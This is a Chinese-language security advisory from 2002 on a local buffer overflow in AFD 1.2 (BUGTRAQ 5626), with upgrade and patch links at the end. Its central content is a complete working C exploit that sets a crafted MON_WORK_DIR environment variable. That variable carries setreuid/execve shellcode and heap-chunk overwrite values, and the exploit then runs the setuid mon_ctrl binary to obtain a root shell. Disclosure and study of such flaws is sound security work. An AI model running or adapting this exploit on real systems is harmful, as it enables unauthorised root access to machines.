多个AFD工作目录本地缓冲溢出漏洞发布时间:2002-09-11 更新时间:2002-09-11 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:5626 受影响系统 AFD AFD 1.2详细描述 AFD (Automatic File Distributor)存在多个基于堆和栈的缓冲溢出,所有问题是相关于对外部提供的工作目录值缺少正确的边界检查,攻击者可以通过环境变量或者命令行提供该值。 由于多个AFS程序以SETUID ROOT属性安装,可导致本地攻击者以ROOT权利执行任意代码。 测试代码 #include <stdio.h> #include <stdlib.h> #include <string.h> char shellcode[] = "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */ "--netric--" "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f" "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d" "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; int main(int argc, char *argv[]) { char buffer[1135]; unsigned int retloc = 0xbfffe360; unsigned int ret = 0x0806f020; /* &shellcode */ if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16); if (argc > 2) ret = strtoul(argv[2], &argv[2], 16); memset(buffer, 0x41, sizeof(buffer)); memcpy(buffer, "MON_WORK_DIR=",13); memcpy(buffer+13, shellcode, strlen(shellcode)); buffer[1117] = 0xff; /* prev_size */ buffer[1118] = 0xff; buffer[1119] = 0xff; buffer[1120] = 0xff; buffer[1121] = 0xfc; /* size field */ buffer[1122] = 0xff; buffer[1123] = 0xff; buffer[1124] = 0xff; buffer[1126] = (retloc & 0x000000ff); /* FD */ buffer[1127] = (retloc & 0x0000ff00) >> 8; buffer[1128] = (retloc & 0x00ff0000) >> 16; buffer[1129] = (retloc & 0xff000000) >> 24; buffer[1130] = (ret & 0x000000ff); /* BK */ buffer[1131] = (ret & 0x0000ff00) >> 8; buffer[1132] = (ret & 0x00ff0000) >> 16; buffer[1133] = (ret & 0xff000000) >> 24; buffer[1134] = 0x0; putenv(buffer); fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n"); fprintf(stdout, "-----------------------------------------------------------------\n"); fprintf(stdout, "Ret = 0x%08x\n", ret); fprintf(stdout, "Retloc = 0x%08x\n", retloc); execl("/bin/mon_ctrl", "mon_ctrl", NULL); return 0; } 解决方案 升级程序: AFD AFD 1.2: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.1: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.2: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.3: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.4: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.5: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.6: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.7: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.8: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.9: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.10: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.11: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.12: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.13: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD AFD 1.2.14: AFD Upgrade src-1.2.15.tar.gz http://www.dwd.de/AFD/download/src-1.2.15.tar.gz AFD Patch patch-1.2.15.bz2 ftp://ftp.dwd.de/pub/afd/patch-1.2.15.bz2 Source code patch. 相关信息 Netric Security Team. 参考:http://online.securityfocus.com/archive/1/290349 相关主页:http://www.dwd.de/AFD/english/index.html |
